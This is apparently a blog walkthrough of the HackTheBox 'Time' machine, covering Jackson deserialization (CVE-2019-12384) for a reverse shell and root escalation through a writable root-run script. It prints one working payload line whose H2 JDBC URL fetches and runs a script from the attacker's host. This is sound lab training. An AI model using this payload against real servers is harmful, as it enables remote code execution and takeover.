Time — HackTheBox Writeup

Source

This is a practical Walkthrough of “Time” machine from HackTheBox. This machine is marked as medium level. Credit goes to egotisticalSW & felamos for making this machine available to us and base points are 30 for this machine.

Passwords, hashes and Flags will be redacted to encourage you to solve those challenges on your own.

Synopsis

“Time” is medium difficulty Linux machine that features Apache server hosting a PHP website. The website homepage is “Online JSON beautifier & validator”. Many websites offer APIs, which will return data in JSON format. Often the JSON provided has white space compressed to reduce the size of the data transferred. This site gives you a quick and easy way to format the JSON so you can read it. Validation feature of this site is still in beta mode, so we can take advantage of it. The vulnerability exists in Jackson Library prior to 2.9.9, where we could control the class to be deserialized. Attacker can leverage this deserialization vulnerability to trigger attacks such as Server-Side Request Forgery (SSRF) and remote code execution. We get initial access through this and we escalate our privileges by exploiting a misconfiguration of shell script which runs with root privileges.

Skills Required

Web Enumeration
Linux Enumeration

Skills Learned

Jackson Deserialization

Enumeration

nmap

Nmap reveals that an OpenSSH (22) and HTTP (80) ports are open on target machine. Further to that, target is an Ubuntu Linux server. BTS, I ran gobuster, checked robots.txt file, basically did every normal enumeration to find extra details, unfortunately there’s nothing to be found.

Let’s intercept the web request using BurpSuite, send it to repeater and check for response. Make sure to use the “validate” feature to intercept the web request.

test
Validation failed

Even if you don’t use Burp, you’d get the same error on homepage. Upon quick google search you’d get the recent CVE-2019–12384, there’s another one CVE from 2017 CVE-2017–7525. TBH, I am not good with JSON stuff, fortunately I found that there’s already a POC available to get an RCE through this vulnerability.

Initial Access

Clone the repository to your local machine and we need to modify the code with our IP:Port. We need two things from the POC, “inject.sql” and “CVE.sh”. Inject.sql is our payload and CVE.sh has code to call the payload.

inject.sql

Modify the IP and Port.

CVE.sh

We need to remove those backslash from the code. This below command will call the payload (inject.sql) which is running in our local server port 9090. I changed the port to 9090, ’cause 8000 is already run on my machine.

[“ch.qos.logback.core.db.DriverManagerConnectionSource”,{“url”:”jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM ‘http://10.10.14.24:9090/inject.sql'"}]

Setup a HTTP server where inject.sql file is and also set up a netcat listener.

http server
netcat

Now copy the above code (change IP:Port) and run it on “validate” input field.

call our payload
reverse shell

Aight, *hacker voice* we are in. We got our reverse shell, now upgrade the shell.

user flag

Privilege Escalation

Now we need to escalate our privileges to root. Let’s run LinPeas on target to find any misconfigurations or outdated applications.

shell file

Check permission of this file.

permission

This script is owned by current user. Let’s read the content.

content

It’s archiving (zip) the the content of html directory and moving it to root directory. So, if it’s moving to root directory then obviously this script is running with root privileges. As you can see below image, current user can’t access the /root directory.

no permission

If we run PSPY, then we’d see that a privileged user (root) is frequently executing this script after every 10 seconds.

PSPY

So, we have the permission to modify the script, let’s do it. Initially I tried with bash one-liner to get the reverse connection, but after every 10secs it gets disconnected. When I checked the timestamp of shell script it restoring the file to its original state after every 5 minutes. We can retrieve the root flag by using copy command or we can copy our SSH pub key to root directory and then SSH into the user.

copy ssh pub key
ssh root
root flag

We got all the flags required to complete this machine.

Thank you for reading this blog. While attempting this challenge I learned so many things. This was unique target with unique vulnerability.

Reference

https://github.com/jas502n/CVE-2019-12384
https://access.redhat.com/security/cve/cve-2019-12384
https://blog.doyensec.com/2019/07/22/jackson-gadgets.html